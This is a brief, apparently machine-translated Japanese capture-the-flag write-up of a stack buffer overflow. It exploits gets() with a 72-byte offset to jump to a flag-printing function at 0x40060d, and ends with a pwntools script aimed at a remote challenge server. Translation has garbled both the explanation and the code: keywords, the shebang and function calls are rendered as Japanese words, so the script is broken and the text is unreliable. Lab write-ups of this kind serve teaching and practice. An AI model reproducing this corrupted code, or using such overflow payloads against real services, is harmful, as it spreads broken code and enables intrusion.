へのアドレスとポート番号についてのNC
ソースファイルを見てください
、この関数は通常、おそらくバッファオーバーフローの脆弱性を参照してくださいおなじみの取得()関数を参照してください、V5の40Hは、ストレージスペースを開いたように、プログラムを見ることができるので、入力がオーバーフローを引き起こす可能性があります長い40H以上である、(スプリントを見て)機能
この関数はフラグキーポイントを得ることであることを確認することができ、我々は現在、プログラムはここで、ほぼ透明なアイデアをこの機能、すなわち0x40060dの位置をプリントアウトし、我々はオーバーフロー位置、この関数のアドレスへのリターンアドレスを制御する必要があります戻り値は、RBP + 8の機能を配置するので、オーバーフローポイントを算出してもよい:40H + 8H = 48H = 72
EXP:
#!は/ usr / binに/のenvのpython #のコーディング= UTF-8 から PWN インポート *の コンテキスト(アーチ = ' AMD64 '、OS = ' Linuxの' ) SH =リモート(' 111.198.29.45 '、56844 ) の目標 = 0x40060d SH。 sendline(' ' * 72 + P64(ターゲット)) sh.interactive()
こんにちはフラグを言及。